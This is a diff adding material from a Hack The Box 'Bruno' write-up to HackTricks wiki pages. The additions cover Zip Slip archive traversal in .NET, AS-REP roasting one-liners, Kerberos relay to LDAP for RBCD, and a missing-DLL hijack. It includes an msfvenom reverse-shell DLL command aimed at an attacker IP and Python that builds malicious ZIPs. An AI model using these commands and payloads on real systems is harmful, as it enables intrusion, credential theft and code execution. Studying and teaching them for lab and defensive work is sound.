HTB Bruno

src/generic-hacking/archive-extraction-path-traversal.md

@@ -18,6 +18,32 @@ Consequences range from overwriting arbitrary files to directly achieving **remo
 2. Victim extracts the archive with a vulnerable tool that trusts the embedded path (or follows symlinks) instead of sanitising it or forcing extraction beneath the chosen directory.
 3. The file is written in the attacker-controlled location and executed/loaded next time the system or user triggers that path.
 
+### .NET `Path.Combine` + `ZipArchive` traversal
+
+A common .NET anti-pattern is combining the intended destination with **user-controlled** `ZipArchiveEntry.FullName` and extracting without path normalisation:
+
+```csharp
+using (var zip = ZipFile.OpenRead(zipPath))
+{
+    foreach (var entry in zip.Entries)
+    {
+        var dest = Path.Combine(@"C:\samples\queue\", entry.FullName); // drops base if FullName is absolute
+        entry.ExtractToFile(dest);
+    }
+}
+```
+
+- If `entry.FullName` starts with `..\\` it traverses; if it is an **absolute path** the left-hand component is discarded entirely, yielding an **arbitrary file write** as the extraction identity.
+- Proof-of-concept archive to write into a sibling `app` directory watched by a scheduled scanner:
+
+```python
+import zipfile
+with zipfile.ZipFile("slip.zip", "w") as z:
+    z.writestr("../app/0xdf.txt", "ABCD")
+```
+
+Dropping that ZIP into the monitored inbox results in `C:\samples\app\0xdf.txt`, proving traversal outside `C:\samples\queue\` and enabling follow-on primitives (e.g., DLL hijacks).
+
 ## Real-World Example – WinRAR ≤ 7.12 (CVE-2025-8088)
 
 WinRAR for Windows (including the `rar` / `unrar` CLI, the DLL and the portable source) failed to validate filenames during extraction.  
@@ -97,5 +123,7 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached
 
 - [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/)
 - [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/)
+- [Meziantou – Prevent Zip Slip in .NET](https://www.meziantou.net/prevent-zip-slip-in-dotnet.htm)
+- [0xdf – HTB Bruno ZipSlip → DLL hijack chain](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
 
 {{#include ../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/asreproast.md

@@ -39,6 +39,12 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
 > [!WARNING]
 > AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
 
+#### Quick one-liners (Linux)
+
+- Enumerate potential targets first (e.g., from leaked build paths) with Kerberos userenum: `kerbrute userenum users.txt -d domain --dc dc.domain`
+- Pull a single user’s AS-REP even with a **blank** password using `netexec ldap <dc> -u svc_scan -p '' --asreproast out.asreproast` (netexec also prints LDAP signing/channel binding posture).
+- Crack with `hashcat out.asreproast /path/rockyou.txt` – it auto-detects **-m 18200** (etype 23) for AS-REP roast hashes.
+
 ### Cracking
 
 ```bash
@@ -77,6 +83,7 @@ ASRepCatcher listen
 ## References
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
+- [0xdf – HTB Bruno (AS-REP roast → ZipSlip → DLL hijack)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
 
 ---
 

src/windows-hardening/active-directory-methodology/ldap-signing-and-channel-binding.md

@@ -9,6 +9,8 @@ LDAP relay/MITM lets attackers forward binds to Domain Controllers to obtain aut
 - **LDAP Channel Binding (CBT)** ties an LDAPS bind to the specific TLS tunnel, breaking relays/replays across different channels.
 - **LDAP Signing** forces integrity-protected LDAP messages, preventing tampering and most unsigned relays.
 
+**Quick offensive check**: tools like `netexec ldap <dc> -u user -p pass` print the server posture. If you see `(signing:None)` and `(channel binding:Never)`, Kerberos/NTLM **relays to LDAP** are viable (e.g., using KrbRelayUp to write `msDS-AllowedToActOnBehalfOfOtherIdentity` for RBCD and impersonate administrators).
+
 **Server 2025 DCs** introduce a new GPO (**LDAP server signing requirements Enforcement**) that defaults to **Require Signing** when left **Not Configured**. To avoid enforcement you must explicitly set that policy to **Disabled**.
 
 ## LDAP Channel Binding (LDAPS only)
@@ -56,5 +58,6 @@ Reg Add HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics /v "16 LDAP Inte
 - [TrustedSec - LDAP Channel Binding and LDAP Signing](https://trustedsec.com/blog/ldap-channel-binding-and-ldap-signing)
 - [Microsoft KB4520412 - LDAP channel binding & signing requirements](https://support.microsoft.com/en-us/topic/2020-and-2023-ldap-channel-binding-and-ldap-signing-requirements-for-windows-kb4520412-ef185fb8-00f7-167d-744c-f299a66fc00a)
 - [Microsoft CVE-2017-8563 - LDAP relay mitigation update](https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8563)
+- [0xdf – HTB Bruno (LDAP signing disabled → Kerberos relay → RBCD)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
 
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md

@@ -216,6 +216,8 @@ adws-enumeration.md
 ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
+- If LDAP signing/channel binding are **disabled** and you can create a machine account, tools like **KrbRelayUp** can relay a coerced Kerberos auth to LDAP, set `msDS-AllowedToActOnBehalfOfOtherIdentity` for your machine account on the target computer object, and immediately impersonate **Administrator** via S4U from off-host.
+
 ## References
 
 - [https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
@@ -225,6 +227,7 @@ adws-enumeration.md
 - [https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)
 - Impacket rbcd.py (official): https://github.com/fortra/impacket/blob/master/examples/rbcd.py
 - Quick Linux cheatsheet with recent syntax: https://tldrbins.github.io/rbcd/
+- [0xdf – HTB Bruno (LDAP signing off → Kerberos relay to RBCD)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
 
 
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md

@@ -68,6 +68,21 @@ Finally, note that **a dll could be loaded indicating the absolute path instead
 
 There are other ways to alter the ways to alter the search order but I'm not going to explain them here.
 
+### Chaining an arbitrary file write into a missing-DLL hijack
+
+1. Use **ProcMon** filters (`Process Name` = target EXE, `Path` ends with `.dll`, `Result` = `NAME NOT FOUND`) to collect DLL names that the process probes but cannot find.
+2. If the binary runs on a **schedule/service**, dropping a DLL with one of those names into the **application directory** (search-order entry #1) will be loaded on the next execution. In one .NET scanner case the process looked for `hostfxr.dll` in `C:\samples\app\` before loading the real copy from `C:\Program Files\dotnet\fxr\...`.
+3. Build a payload DLL (e.g. reverse shell) with any export: `msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f dll -o hostfxr.dll`.
+4. If your primitive is a **ZipSlip-style arbitrary write**, craft a ZIP whose entry escapes the extraction dir so the DLL lands in the app folder:
+
+```python
+import zipfile
+with zipfile.ZipFile("slip-shell.zip", "w") as z:
+    z.writestr("../app/hostfxr.dll", open("hostfxr.dll","rb").read())
+```
+
+5. Deliver the archive to the watched inbox/share; when the scheduled task re-launches the process it loads the malicious DLL and executes your code as the service account.
+
 ### Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath
 
 An advanced way to deterministically influence the DLL search path of a newly created process is to set the DllPath field in RTL_USER_PROCESS_PARAMETERS when creating the process with ntdll’s native APIs. By supplying an attacker-controlled directory here, a target process that resolves an imported DLL by name (no absolute path and not using the safe loading flags) can be forced to load a malicious DLL from that directory.
@@ -561,6 +576,8 @@ C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c
 - [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/)
 - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
 - [Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit](https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit)
+- [0xdf – HTB Bruno ZipSlip → DLL hijack chain](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
+
 
+{{#include ../../../banners/hacktricks-training.md}}
 
-{{#include ../../../banners/hacktricks-training.md}}